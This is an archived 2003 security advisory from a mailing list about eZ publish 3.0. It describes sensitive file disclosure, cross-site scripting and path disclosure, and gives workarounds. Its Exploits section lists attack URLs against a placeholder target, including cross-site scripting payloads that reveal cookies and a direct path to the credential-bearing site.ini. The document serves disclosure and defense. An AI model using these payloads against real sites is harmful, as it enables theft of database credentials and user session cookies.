[UNIX] Multiple Vulnerabilities in Ez Publish

From: support@securiteam.com
Date: 04/18/03

  • Next message: support@securiteam.com: "[NEWS] Vignette Story Server Sensitive Information Disclosure" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 18 Apr 2003 11:29:50 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Multiple Vulnerabilities in Ez Publish
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.ez.no/> eZ publish 3 is "an open source content management
    system and development framework". Three types of vulnerabilities have
    been found in the product, Sensitive information disclosure, Cross Site
    Scripting, and Path Disclosure.

    DETAILS

    Vulnerable systems:
     * Ez Publish version 3.0 and prior

    Sensitive information disclosure:
    A security vulnerability was found in Ez publish which allows a remote
    attacker to access sensitive information such as the database's name and
    password.

    This vulnerability can be triggered by a remote user by submitting a
    specially crafted HTTP request.

    For example, an attacker can download the site.ini file and disclose
    sensitive information such as this:
    ---- site.ini -----

    [DatabaseSettings]
    DatabasePluginPath=
    # Use either ezmysql or ezpostgresql
    DatabaseImplementation=ezmysql
    Server=localhost
    User=nextgen
    Password=nextgen
    Database=nextgen
    # Enable slave servers
    # The slave servers will only be used for read queries
    # Useful for load balanced environments
    UseSlaveServer=disabled
    #SlaveServerArray[]=localhost
    #SlaverServerUser[]=nextgen
    #SlaverServerPassword[]=nextgen
    #SlaverServerDatabase[]=nextgen
    # The number of times to reconnect if the first fails
    ConnectRetries=0
    Charset=iso-8859-1
    # Use charset conversion routines in DB if possible
    UseBuiltinEncoding=true
    Socket=disabled
    SQLOutput=disabled
    UsePersistentConnection=disabled

    [SiteSettings]
    # Name of the site, will be used in default templates in titles.
    SiteName=eZ publish
    # URL of site, often used to link to site in emails etc.
    SiteURL=mysite.com
    # List of metadata to set in pagelayout
    MetaDataArray[author]=eZ systems
    MetaDataArray[copyright]=eZ systems
    MetaDataArray[description]=Content Management System
    MetaDataArray[keywords]=cms, publish, e-commerce, content management
    Dir=
    # Which page to show when the root index (/) is accessed
    IndexPage=/content/view/sitemap/2/
    # What to do when a module does not exists, use either defaultpage or
    displayerror
    ErrorHandler=displayerror
    # Displayed if an error occurs and ErrorHandler is set to defaultpage
    DefaultPage=/content/view/sitemap/2/
    # Default access is needed when uri type matching is done, this is
    # because with empty urls it's not possible to fetch the access
    DefaultAccess=demo
    # How the login page should be handled, use embedded to show inside
    default
    pagelayout
    # or custom for loginpagelayout.tpl
    LoginPage=custom
    # The SSL port, the default should be OK for most sites but can be
    # changed if different. If the port is detect all redirects will
    # be done with https protocol.
    SSLPort=443

    -------------------

    Cross Site Scripting:
    Many exploitable cross-site scripting bugs were found in Ez publish which
    cause script execution on client's computer whenever he follows a
    specially crafted URL.

    This kind of attack known as "Cross-Site Scripting Vulnerability" is
    present in many section of the web site. An attacker can input specially
    crafted links and/or other malicious scripts.

    Path Disclosure:
    Many vulnerabilities have been found in Ez publish which allow attackers
    to determine the physical path of the application.

    These vulnerabilities would allow a remote user to determine the full path
    to the web root directory and other potentially sensitive information.
    This vulnerability can be triggered by a remote user submitting a
    specially crafted HTTP request.

    Exploits:
    Sensitive information disclosure:
    http://[target]/settings/[file_name]

    For example:
    http://[target]/settings/site.ini

    Cross Site Scripting:
    http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_code]
    http://[target]/index.php/content/advancedsearch/?SearchText=[hostile_code]&PhraseSearchText=[hostile_code]&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search
    http://[target]/index.php/[any_section]/">[hostile_code]<
    http://[target]/index.php/"><script>[hostile_code]<

    The hostile code could be:
    [script]alert("Cookie="+document.cookie)[/script]
    (open a window with the cookie of the visitor, replace [] by <>)

    Path Disclosure:
    Numerous files of the kernel directory are affected.
    http://[target]/kernel/class/delete.php
    http://[target]/kernel/class/edit.php
    http://[target]/kernel/class/ezcontentclassfeature.php
    http://[target]/kernel/class/groupedit.php
    http://[target]/kernel/class/grouplist.php
    http://[target]/kernel/class/list.php
    http://[target]/kernel/class/removeclass.php
    http://[target]/kernel/class/removegroup.php
    http://[target]/kernel/class/classlist.php
    http://[target]/kernel/class/copy.php
    http://[target]/kernel/classes/ezorderitem.php
    http://[target]/kernel/classes/ezpersistentobject.php
    http://[target]/kernel/classes/ezpolicy.php
    http://[target]/kernel/classes/ezpolicylimitation.php
    http://[target]/kernel/classes/ezpolicylimitationvalue.php
    http://[target]/kernel/classes/ezproductcollection.php
    http://[target]/kernel/classes/ezproductcollectionitem.php
    http://[target]/kernel/classes/ezproductcollectionitemoption.php
    http://[target]/kernel/classes/ezrole.php
    http://[target]/kernel/classes/ezsearch.php
    http://[target]/kernel/classes/ezsearchlog.php
    ..

    Workarounds:
    Cross Site Scripting:
    Use the PHP function eregi_replace to filter out user input data.

    Path Disclosure:
    You can fix the path disclosure problem by adding the following code in
    all the affected files:

    -------CUT-------

    error_reporting(0);

    -------CUT-------

    Vendor status:
    The vendor has been notified.

    ADDITIONAL INFORMATION

    The original advisory can be found at:
    <http://www.security-corporation.com/index.php?id=advisories&a=016>
    http://www.security-corporation.com/index.php?id=advisories&a=016

    The original french advisory can be found at:
    <http://www.security-corporation.com/index.php?id=advisories&a=016-FR>
    http://www.security-corporation.com/index.php?id=advisories&a=016-FR

    The information has been provided by
    <mailto:gregory.lebras@security-corporation.com> Gregory Le Bras.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: support@securiteam.com: "[NEWS] Vignette Story Server Sensitive Information Disclosure"
    • Quantcast